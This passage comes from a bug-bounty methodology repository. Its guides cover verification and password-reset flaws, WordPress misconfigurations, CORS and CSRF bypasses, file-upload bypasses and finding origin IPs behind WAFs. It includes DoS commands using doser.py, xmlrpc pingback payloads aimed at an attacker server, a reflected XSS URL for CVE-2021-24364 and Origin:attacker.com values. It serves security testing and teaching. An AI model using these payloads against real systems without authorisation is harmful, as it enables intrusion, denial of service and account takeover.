 53 |     2)Application in my case give less Privileges & Features to access if not verified.
 54 |     3)Logged into the Application & I change the email Address to Email B.
 55 |     4)A Verification Link was Send & I verified that.
 56 |     5) Now I again Changed the email back to Email I have entered at the time of account creation.
 57 |     6) It showed me that my Email is Verified.
 58 |     7) Hence , A Succesful Email verfication Bypassed as I haven't Verified the Link which was sent to me in the time of account creation still my email got verified.
 59 |     8)Didn't Receive any code again for verification when I changed back my email & When I open the account it showed in my Profile that its Verified Email.
 60 | ```
 61 | 
 62 | `Impact` :
 63 | Email Verfication was bypassed due to Broken Authentication Mechanism , Thus more Privileged account can be accessed by an attacker making website prone to Future Attacks.    
 64 |   Happy Hacking:)
 65 |   
 66 |   ### Email Verification Bypass (P3/P4)
 67 |   * Steps :
 68 |    ``` 
 69 |     1)First You need to Create an account with Your Own Email Address.
 70 |     2)After Creating An Account A Verification Link will be sent to your account.
 71 |     3)Dont Use The Email Verification link. Change Your Email to Victim's Email.
 72 |     4)Now Go in Your Email and Click on Your Own Email Verification Link.
 73 |     5)if the Victim's Email Get Verified then This is a Bug.
 74 | ```
 75 | `Impact` : Email Verfication Bypass
 76 | 
 77 |  ### Old Password Reset Token Not Expiring Upon Requesting New One (Sometimes P4) :
 78 |   * Steps :
 79 |  ``` 
 80 |     1)First You need to Create an account with a Valid Email Address.
 81 |     2)After Creating An Account log out from your Account and Navigate on Forgot Password Page.
 82 |     3)Request a Password Reset Link for your Account.A Verification Link will be sent to your account.
 83 |     4)Without Using this Password Reset Link Request A New Password Reset Link.
 84 |     5)Now go in Your email and Use 1st Password Reset Link Rather than Using 2nd One And Change Your Password.
 85 |     6) If You Are Able to Change Your Password Than This Is a tiny Bug ;).
 86 | ```
 87 | * Note:- Some Companies Won't Accept it As Valid Issue. 
 88 | 
 89 | ### Password Reset Token Not Expiring After Password Change (P4):
 90 |   * Steps :
 91 |  ``` 
 92 |     1)First You need to Create an account with a Valid Email Address.
 93 |     2)After Creating An Account log out from your Account and Navigate on Forgot Password Page.
 94 |     3)Request a Password Reset Link for your Account.
 95 |     4)Use The Password Reset Link And Change The Password, After Changing the Password Login to Your Account.
 96 |     5)Now Use The Old Password Reset Link To Change The Password Again.
 97 |     6) If You Are Able to Change Your Password Again Than This Is a tiny Bug  ;).
 98 | ```
 99 | 
100 | ### Insufficient account process validation leads to account takeover (P3/P4):
101 |    * Steps :
102 | ```
103 |       1) Create an account on the website.
104 |       2) Go to profile section. And Change & update your details in the name parameter and before saving it Open Burp suite, turn the proxy on and then click on Save.
105 |       3) Now capture the request in Burp suite and send it to the Repeater tab.
106 |       4) Now log out from the website and go back to the Burp suite.
107 |       5) Now change the details email & name parameters and click on "Go" in the repeater tab.
108 |       6) Now you will be able to see 200 ok response from the web server.
109 |       7) Now, login into your account and go to the Profile section to confirm
110 | ```
111 | 
112 | * Thanks For Reading Guys Happy Hunting :).
113 | 
114 |   ## Resources:
115 |   Google,Youtube.
116 | 
117 | ## Authors
118 | * [https://twitter.com/Virdoex_hunter](https://twitter.com/Virdoex_hunter) 
119 | * Linkedin : [@chirag_Agrawal](https://www.linkedin.com/in/chirag-agrawal-770488144/), Twitter  : [@Raiders](https://twitter.com/ChiragA15977205)
120 | * Twitter : [Fani Malik](https://twitter.com/fanimalikhack) 
121 | * Linkedin : [@suprit-pandurangi](https://www.linkedin.com/in/suprit-pandurangi-a90526106/)
122 | 


--------------------------------------------------------------------------------
/CMS/AEM.md:
--------------------------------------------------------------------------------
 1 | ## Adobe Experience Manager
 2 | 
 3 | ### Tools
 4 | + [aem-hacker](https://github.com/0ang3el/aem-hacker)
 5 | + [aemscan](https://github.com/Raz0r/aemscan)
 6 | 
 7 | ### Wordlist for fuzzing
 8 | + [aem.txt](https://raw.githubusercontent.com/clarkvoss/AEM-List/main/paths)
 9 | 
10 | ### Resources
11 | + [Approaching AEM](https://www.bugcrowd.com/resources/webinar/aem-hacker-approaching-adobe-experience-manager-web-apps/)
12 | + [Securing AEM](https://www.slideshare.net/0ang3el/securing-aem-webapps-by-hacking-them)
13 | 


--------------------------------------------------------------------------------
/CMS/Drupal.md:
--------------------------------------------------------------------------------
 1 | ## Drupal Nodes
 2 | 
 3 | Tips:
 4 | ```
 5 |  If you hunt on a Drupal website: fuzz with intruder on '/node/$' where '$' is a number (from 1 to 500 for example). 
 6 |  You could find hidden pages (test, dev) which are not referenced by the search engines.
 7 | ```
 8 | 
 9 | * [adrien_jeanneau](https://twitter.com/adrien_jeanneau/status/1273952564430725123?t=SUinUf09jxjRXu1yF9AQDg&s=19)
10 | 


--------------------------------------------------------------------------------
/CMS/Moodle.md:
--------------------------------------------------------------------------------
1 | ## Mass Hunting XSS — Moodle
2 | * [https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516](https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516)
3 | 
4 | ## Author:
5 | [@th3.d1p4k](https://twitter.com/DipakPanchal05)
6 | 


--------------------------------------------------------------------------------
/CMS/wordpress.md:
--------------------------------------------------------------------------------
  1 | # Wordpress Common Misconfiguration
  2 | Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well
  3 | 
  4 | # Index
  5 | * Wordpress Detection
  6 | * General Scan Tool
  7 | * xmlrpc.php
  8 | * Directory listing
  9 | * CVE-2018-6389
 10 | * CVE-2021-24364
 11 | * WP Cornjob DOS
 12 | * WP User Enumeration
 13 | 
 14 | # Wordpress Detection
 15 | Well, if you are reading this you already know about technology detection tool and methods.
 16 | Still adding them below
 17 | * Wappalyzer
 18 | * WhatRuns
 19 | * BuildWith
 20 | 
 21 | # Geneal Scan Tool
 22 | * WpScan
 23 | 
 24 | # xmlrpc.php 
 25 | This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well.
 26 | 
 27 | ### Detection
 28 | * visit site.com/xmlrpc.php
 29 | * Get the error message about POST request only
 30 | 
 31 | ### Exploit
 32 | * Intercept the request and change the method GET to POST
 33 | * List all Methods
 34 |     ```
 35 |     <methodCall>
 36 |     <methodName>system.listMethods</methodName>
 37 |     <params></params>
 38 |     </methodCall>
 39 |     ```
 40 | * Check the ```pingback.ping``` mentod is there or not
 41 | * Perform DDOS
 42 |     ```
 43 |     <methodCall>
 44 |     <methodName>pingback.ping</methodName>
 45 |     <params><param>
 46 |     <value><string>http://<YOUR SERVER >:<port></string></value>
 47 |     </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
 48 |     </value></param></params>
 49 |     </methodCall>
 50 |     ```
 51 | * Perform SSRF (Internal PORT scan only)
 52 |     ```
 53 |     <methodCall>
 54 |     <methodName>pingback.ping</methodName>
 55 |     <params><param>
 56 |     <value><string>http://<YOUR SERVER >:<port></string></value>
 57 |     </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
 58 |     </value></param></params>
 59 |     </methodCall>
 60 |     ```
 61 | ### Tool To Automate XMLRPC-Scan.
 62 | 
 63 | [XMLRPC-Scan](https://github.com/nullfil3/xmlrpc-scan)
 64 | 
 65 | ### References
 66 | [Bug Bounty Cheat Sheet](https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html)
 67 | 
 68 | [Medium Writeup](https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32)
 69 | 
 70 | [WpEngine Blog Post](https://wpengine.com/resources/xmlrpc-php/)
 71 | 
 72 | # Directory listing
 73 | Sometimes developers forget to disable the directory listing on /wp-content/uploads. So this is the common issue on wordpress sites.
 74 | 
 75 | ### Detection
 76 | /wp-content/uploads
 77 | 
 78 | ### Pro tip
 79 | Add this path to your fuzzing wordlist
 80 | 
 81 | ### References
 82 | [H1 Report](https://hackerone.com/reports/201984)
 83 | [H1 Report](https://hackerone.com/reports/762118)
 84 | [H1 Report](https://hackerone.com/reports/789388)
 85 | [H1 Report](https://hackerone.com/reports/448985)
 86 | 
 87 | # CVE-2018-6389
 88 | This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3
 89 | 
 90 | ### Detection
 91 | Use the URL from my gist called loadsxploit, you will get a massive js data in response.
 92 | 
 93 | [loadsxploit](https://gist.github.com/remonsec/4877e9ee2b045aae96be7e2653c41df9)
 94 | 
 95 | ### Exploit
 96 | You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second
 97 | 
 98 | [Doser](https://github.com/quitten/doser.py)
 99 | ```
100 | python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'
101 | ```
102 | ### References
103 | [H1 Report](https://hackerone.com/reports/752010)
104 | 
105 | [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)
106 | 
107 | [Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html)
108 | 
109 | # CVE-2021-24364
110 | The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
111 | 
112 | ### Detection and Exploit
113 | * Replace <Your_WP-Site-here> to your WP-site
114 | <Your_WP-Site-here>/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
115 | * Wait for the pop-up!
116 | 
117 | ### Reference 
118 | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-24364)
119 | 
120 | # WP Cornjob DOS
121 | This is another area where you can perform a DOS attack.
122 | 
123 | ### Detection
124 | * visit site.com/wp-cron.php
125 | * You will see a Blank page with 200 HTTP status code
126 | 
127 | ### Exploit
128 | You can use the same tool Doser for exploiting this 
129 | ```
130 | python3 doser.py -t 999 -g 'https://site.com/wp-cron.php'
131 | ```
132 | ### Reference
133 | 
134 | [GitHub Issue](https://github.com/wpscanteam/wpscan/issues/1299)
135 | 
136 | [Medium Writeup](https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30)
137 | 
138 | # WP User Enumeration
139 | This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff
140 | 
141 | ### Detection
142 | * visit site.com/wp-json/wp/v2/users/
143 | * You will see json data with user info in response
144 | 
145 | ### Exploit
146 | If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well
147 | 
148 | ### Reference
149 | [H1 Report](https://hackerone.com/reports/356047)
150 | 
151 | # Researcher Note
152 | Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look while testing for other vulnerabilities and most of the time they work good for chaining with other low bugs.
153 | 
154 | # Author
155 | **Name:** Mehedi Hasan Remon
156 | 
157 | **Handle:** [@remonsec](https://twitter.com/remonsec)
158 | 


--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
 1 | # Contributor Covenant Code of Conduct
 2 | 
 3 | ## Our Pledge
 4 | 
 5 | In the interest of fostering an open and welcoming environment, we as
 6 | contributors and maintainers pledge to making participation in our project and
 7 | our community a harassment-free experience for everyone, regardless of age, body
 8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
 9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 | 
12 | ## Our Standards
13 | 
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 | 
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 | 
23 | Examples of unacceptable behavior by participants include:
24 | 
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 |  advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 |  address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 |  professional setting
33 | 
34 | ## Our Responsibilities
35 | 
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 | 
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 | 
46 | ## Scope
47 | 
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 | 
55 | ## Enforcement
56 | 
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at patelkathan22@gmail.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 | 
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 | 
68 | ## Attribution
69 | 
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 | 
73 | [homepage]: https://www.contributor-covenant.org
74 | 
75 | For answers to common questions about this code of conduct, see
76 | https://www.contributor-covenant.org/faq
77 | 


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | ## Contributing
 2 | 
 3 | If you have any ideas for things we should include, please use ONE of the following methods to submit them:
 4 | 
 5 | * Send us pull requests
 6 | * Create an issue in the project (with links, and we'll parse and incorporate them)
 7 | * Message us on twitter `https://twitter.com/KathanP19` or `https://twitter.com/remonsec` with content to add.
 8 | 
 9 | Significant effort is made to give attribution for these content whenever possible, and if you are a content owner or know who the original author/curator is, please let us know so we can give proper credit.
10 | 


--------------------------------------------------------------------------------
/CORS/CORS.md:
--------------------------------------------------------------------------------
 1 | # Misconfigured CORS
 2 |  Here are few methods and steps you can do to check for misconfigure cors.
 3 | 
 4 | * Hunting method 1(Single target):
 5 | 
 6 | ```
 7 | Step->1. Capture the target website and spider or crawl all the website using burp.
 8 | Step->2. Use burp search look for Access-Control
 9 | Step->3. Try to add Origin Header i.e,Origin:attacker.com or Origin:null or Origin:attacker.target.com or Origin:target.attacker.com
10 | Step->4  If origin is reflected in response means the target is vuln to CORS
11 | ```
12 | -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
13 | 
14 | * Hunting method 2(mutliple means including subdomains):
15 | ```
16 | step 1-> find domains i.e subfinder -d target.com -o domains.txt
17 | step 2-> check alive ones : cat domains.txt | httpx | tee -a alive.txt
18 | step 3-> send each alive domain into burp i.e, cat alive.txt | parallel -j 10 curl --proxy "http://127.0.0.1:8080" -sk 2>/dev/null
19 | step 4-> Repeat hunting method 1
20 | ```
21 | -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
22 | 
23 | * Both above method are manual methods so lets check an automated way
24 | # Tools
25 | * [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner)
26 | * [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer)
27 | * [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy)
28 | * [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe)
29 | 
30 | # Automate Way :
31 | ```
32 | step1-> find domains i.e, subfinder -d domain.com -o target.txt
33 | step2-> grep alive: cat target.txt | httpx | tee -a alive.txt
34 | step3-> grep all urls using waybackurls by @tomnomnom and gau tool i.e,cat alive.txt | gau | tee -a urls.txt
35 | step4-> run any of these tools on each url 
36 | step5-> configure the manually
37 | ```
38 | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
39 | 
40 | # Another Method
41 | 
42 | ### Tools You Will Need for this method.
43 | * [https://github.com/tomnomnom/meg](https://github.com/tomnomnom/meg)
44 | * [https://github.com/tomnomnom/gf](https://github.com/tomnomnom/gf)
45 | * [https://github.com/projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder)
46 | * [https://github.com/tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder)
47 | * [https://github.com/Edu4rdSHL/findomain](https://github.com/Edu4rdSHL/findomain)
48 | * [https://github.com/projectdiscovery/httpx](https://github.com/projectdiscovery/httpx)
49 |          
50 | ### Steps
51 | ```
52 | 1) Find Domains with the help of subfinder,assetfinder,findomain i.e , subfinder -d target.com | tee -a hosts1 , findomain -t target.com | tee -a hosts1 , assetfinder --subs-only target.com |tee -a hosts1 .
53 | 2) Then cat hosts1 | sort -u | tee -a hosts2 and then cat hosts2 | httpx | tee -a hosts .
54 | 3) Navigate through terminal where hosts file is located  echo "/" > paths
55 | 4) Then type meg -v
56 | 5) After the completion of process type gf cors.
57 | 6) All the urls with Access-Control-Allow will be displayed.  
58 | ```
59 | 
60 | # Authors
61 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
62 | 


--------------------------------------------------------------------------------
/CORS/CORS_Bypasses.md:
--------------------------------------------------------------------------------
 1 | # CORS Bypass	
 2 | 1. `Origin:null`
 3 | 2. `Origin:attacker.com`
 4 | 3. `Origin:attacker.target.com`
 5 | 4. `Origin:attackertarget.com`
 6 | 5. `Origin:sub.attackertarget.com`
 7 | 6. `Origin:attacker.com and then change the method Get to post/Post to Get`
 8 | 7. `Origin:sub.attacker target.com`
 9 | 8. `Origin:sub.attacker%target.com`
10 | 9. `Origin:attacker.com/target.com`
11 | 
12 | ### Authors
13 | 
14 | * [@tamimhasan404](https://twitter.com/tamimhasan404)
15 | 	
16 | # Reference Tweets
17 | https://twitter.com/trbughunters/status/1287023673845612546
18 | 
19 | https://twitter.com/Paresh_parmar1/status/1265251507655630848
20 | 
21 | https://twitter.com/Alra3ees/status/1141504347089584128
22 | 


--------------------------------------------------------------------------------
/CSRF/Cross_Site_Request_Forgery_Bypass.md:
--------------------------------------------------------------------------------
 1 | **Cross Site Request Forgery(CSRF)**
 2 | 
 3 | Hello Guys, I Tried My Best To Share all The CSRF Bypasses I Know.
 4 | I Hope This Will Help You.
 5 | 
 6 | Csrf will be login, logout, resetpass, change password, add-cart, like, comment, profie change, user details change, blance transffer, subscription ect
 7 | ```
 8 | -Change Request Method [POST => GET]
 9 | 
10 | -Remove Total Token Parameter
11 | 
12 | -Remove The Token, And Give a Blank Parameter
13 | 
14 | -Copy a Unused Valid Token , By Dropping The Request and Use That Token
15 | 
16 | -Use Own CSRF Token To Feed it to Victim
17 | 
18 | -Replace Value With Of A Token of Same Length 
19 | 
20 | -Reverse Engineer The Token
21 | 
22 | -Extract Token via HTML injection
23 | 
24 | -Switch From Non-Form `Content-Type: application/json` or `Content-Type: application/x-url-encoded` To `Content-Type: form-multipart`
25 | 
26 | -Change/delete the last or frist character from the token
27 | 
28 | -Change referrer to Referrer
29 | 
30 | -Bypass the regex
31 |   If the site is looking for “bank.com” in the referer URL, maybe “bank.com.attacker.com” or “attacker.com/bank.com” will work.
32 |     
33 | -Remove the referer header (add this <meta name=”referrer” content=”no-referrer”> in your payload or html code)
34 | 
35 | -Clickjacking
36 | 
37 |   (If you aren’t familiar with clickjacking attacks, more information can be found https://owasp.org/www-community/attacks/Clickjacking.)
38 |   Exploiting clickjacking on the same endpoint bypasses all CSRF protection. Because technically, the request is indeed originating from the legitimate site. If the page where   the vulnerable endpoint is located on is vulnerable to clickjacking, all CSRF protection will be rendered irrelevant and you will be able to achieve the same results as a CSRF   attack on the endpoint, albeit with a bit more effort.
39 | 	
40 | 
41 | 
42 | ```
43 | 
44 | ### References
45 | [Medium Writeup](https://medium.com/swlh/intro-to-csrf-cross-site-request-forgery-9de669df03de)
46 | 
47 | [Medium Writeup](https://medium.com/swlh/attacking-sites-using-csrf-ba79b45b6efe)
48 | 
49 | [Medium Writeup](https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee)
50 | 
51 | 
52 | ### Authors
53 | * [@SMHTahsin33](https://twitter.com/SMHTahsin33)
54 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
55 | * [@remonsec](https://twitter.com/remonsec)
56 | * [@tamimhasan404](https://twitter.com/tamimhasan404)
57 | 
58 | 


--------------------------------------------------------------------------------
/CSRF/README.md:
--------------------------------------------------------------------------------
 1 | # Some MindMap
 2 | ---
 3 | ### 6 CSRF Bypass by Hack3rSr0lls
 4 | ![https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900](https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900)
 5 | 
 6 | ### CSRF Mindmap
 7 | ![https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b](https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b)
 8 | 
 9 | ### Source
10 | * [https://twitter.com/hackerscrolls/status/1265217322308046849](https://twitter.com/hackerscrolls/status/1265217322308046849)
11 | 
12 | ### Author
13 | * [KathanP19](https://twitter.com/KathanP19)
14 | 


--------------------------------------------------------------------------------
/CVES/easycve.md:
--------------------------------------------------------------------------------
 1 | # Easy CVES using Researching
 2 |   
 3 | ### Tools
 4 | * Google
 5 | * Twitter
 6 | * Nuclei
 7 |   
 8 | ## Steps:
 9 | ```
10 |     1.Grab all the subdomains i.e, subfinder -d domain.com | tee -a domains.txt
11 |     2.Grap all alive domains i.e,  cat domains.txt | httpx -status-code | grep 200 | cut -d " " -f1 | tee -a alive.txt
12 |     3.Run nuclei basic-detection,panels,workflows,cves templates differently and store results in different file. i.e, cat alive.txt | nuclei -t nuclei-templates/workflows | tee -a workflows.
13 |     4.Read each output carefully with patience.
14 |     5.Find interest tech used by target. i.e, jira
15 |     6.put that link into browser check the version used by target.
16 |     7.Go on google search with jira version exploit.
17 |     8.grep the cves
18 |     9.Go to twitter in explore tab search CVE(that you found from google) poc or CVE exploit
19 |     10.Go to google and put cve or some details grab from  twitter for a better poc read writeups related to that.
20 |     11.Try all cves if success report it.:)
21 |  ```   
22 | 
23 | ### Authors
24 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter)
25 |     
26 |     
27 |     
28 | 


--------------------------------------------------------------------------------
/CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf


--------------------------------------------------------------------------------
/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf


--------------------------------------------------------------------------------
/CheckList/Web_Penetration_Testing_Methodology@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/CheckList/Web_Penetration_Testing_Methodology@2x.png


--------------------------------------------------------------------------------
/CheckList/mindmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KathanP19/HowToHunt/8258fb12d3cbdf9ec8aa22f63f9bc1b0ee16f69b/CheckList/mindmap.png


--------------------------------------------------------------------------------
/EXIF_Geo_Data_Not_Stripped/exif_geo.md:
--------------------------------------------------------------------------------
 1 | <h4>Summary:</h4>
 2 | When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc.
 3 | 
 4 | <h4>Steps to reproduce:</h4>
 5 | 
 6 | 1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg) <br>
 7 | 2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s . <br>
 8 | 3. Go to Upload option on the website <br>
 9 | 4. Upload the image<br>
10 | 5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect ,   edit it as html )</br>
11 | 6. open it (http://exif.regex.info/exif.cgi)</br>
12 | 7. See wheather is that still showing exif data , if it is then Report it.
13 | 
14 | # Reports (Hackerone)
15 | 
16 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907)
17 | 
18 | # Author
19 | * [@0xd3vil](https://twitter.com/0xd3vil)
20 | * [@klaus](https://twitter.com/klaus_dev)
21 | 


--------------------------------------------------------------------------------
/File_Upload/old_file_upload_bypass.md:
--------------------------------------------------------------------------------
 1 | # Bypassing File Uploads
 2 | 
 3 | Suppose you have a limitation that you can only upload in a few formats like PDF, JPEG, JPG, ….But what if you can upload a PHP file by defying the Upload mechnism and validation of file type check. let me tell you if someone can upload a PHP file then its game over for the website as he will upload a php shell and can easily perform an RCE , or Worst will simply gain a reverse shell on the server.
 4 | 
 5 | > __How does Bypass work__
 6 | 
 7 | Well it depends on which kind of validation the system is using …it is just verfying the extension ?? if its just doing that then it becomes very easy to bypass and upload a PHP file or something malicious. suppose we have to upload a JPG file so the extension must be something.jpg
 8 | 
 9 | ---
10 | 
11 | 
12 | ### 1. Bypassing Normal extension
13 | Now what we can do is we can upload a file which looks like this something.php.jpg or somethings.jpg.php.
14 | ### 2. Bypassing the magic Byte validation.
15 | 
16 | For this method we use polygots. Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
17 | 
18 | so while we have to upload a JPEG file type we actaully can upload a PHAR-JPEG file which will appear to be a JPEg file type to the server while validating. the reason is the file PHAR-JPEg file has both the JPEG header and the PHP file also. so while uploading it didn’t get detected and later after processing the PHP file can be used to exploit.
19 | 
20 | And at last Uploading a shell to some random websites for fun is not really cool so don’t ever try untill unless you have the permission to test.
21 | 
22 | ## 3. Path traversal Upload
23 | upload file with filename as:
24 |     
25 |     ../test.png 
26 |     ..%2Ftest.png
27 | 
28 | -----
29 | 
30 | 
31 | **How the bypass was possible?**
32 | 
33 | 1. Create a malicious file with an extension that is accepted by the application.
34 | 2. Upload that file and click on send.
35 | 3. Capture the request in any proxy tool, edit the file extension to the malicious extension that you want. In some cases, you might need to change the content type of a file.
36 | 4. Forward the request to the server.
37 | 
38 | ------
39 | 
40 | **Test PDF upload functionality.**
41 | 
42 | - [https://github.com/jonaslejon/malicious-pdf](https://github.com/jonaslejon/malicious-pdf)
43 | 
44 | Resources :-
45 | 
46 | - [File upload Bypass pdf](https://harshitsengar.in/resources/File%20Upload%20Bypass%20.pdf)
47 | 


--------------------------------------------------------------------------------
/FindOriginIP/FindOrigin.md:
--------------------------------------------------------------------------------
  1 | # Finding Origin IPs Behind WAFs
  2 | 
  3 | ## Introduction
  4 | 
  5 | Web Application Firewalls (WAFs) like Cloudflare, AWS WAF, and others protect web applications by filtering and monitoring HTTP traffic. However, discovering the origin IP address behind these protective layers can be crucial during security assessments. This guide outlines various techniques to identify origin IPs.
  6 | 
  7 | ## Identifying the Presence of a WAF
  8 | 
  9 | Before attempting to bypass a WAF, first confirm its presence:
 10 | 
 11 | ```bash
 12 | # Get the IP address
 13 | dig +short example.com
 14 | 
 15 | # Check the organization
 16 | curl -s https://ipinfo.io/IP | jq -r '.org'
 17 | ```
 18 | 
 19 | **Common WAF Indicators:**
 20 | - AWS WAF: Look for "AWSLB" and "AWSLBCORS" cookies
 21 | - Cloudflare: Organization info will indicate Cloudflare, Inc.
 22 | - Other WAFs may have specific signatures or response headers
 23 | 
 24 | ## Techniques for Origin IP Discovery
 25 | 
 26 | ### 1. Historical DNS Records
 27 | 
 28 | Historical DNS records often reveal IPs used before WAF implementation:
 29 | 
 30 | - **SecurityTrails DNS History**
 31 |   - Visit: https://securitytrails.com/domain/example.com/dns
 32 |   - Export historical A records
 33 |   - Extract IPs:
 34 |     ```bash
 35 |     grep -E -o "([0-9]{1,3}[\\.]){3}[0-9]{1,3}" dns_history.txt | sort -u > potential_ips.txt
 36 |     ```
 37 | 
 38 | - **DNS Dumpster**
 39 |   - Use https://dnsdumpster.com to generate network maps
 40 |   - Look for non-WAF IP addresses in the results
 41 | 
 42 | ### 2. Subdomain Enumeration
 43 | 
 44 | Development or staging environments often lack proper WAF protection:
 45 | 
 46 | ```bash
 47 | # Find subdomains and their IPs
 48 | subfinder -silent -d example.com | dnsprobe -silent | awk '{ print $2 }' | sort -u > subdomain_ips.txt
 49 | ```
 50 | 
 51 | Focus on subdomains like:
 52 | - dev.example.com
 53 | - staging.example.com
 54 | - test.example.com
 55 | - beta.example.com
 56 | 
 57 | ### 3. SSL Certificate Information
 58 | 
 59 | Certificates often reveal all domains and IPs where they're deployed:
 60 | 
 61 | - **Censys Method**:
 62 |   1. Search for certificates using your target domain
 63 |   2. Select "Certificates" in the input field and search for your domain
 64 |   3. Review each certificate and click "Explore" > "IPv4 Hosts"
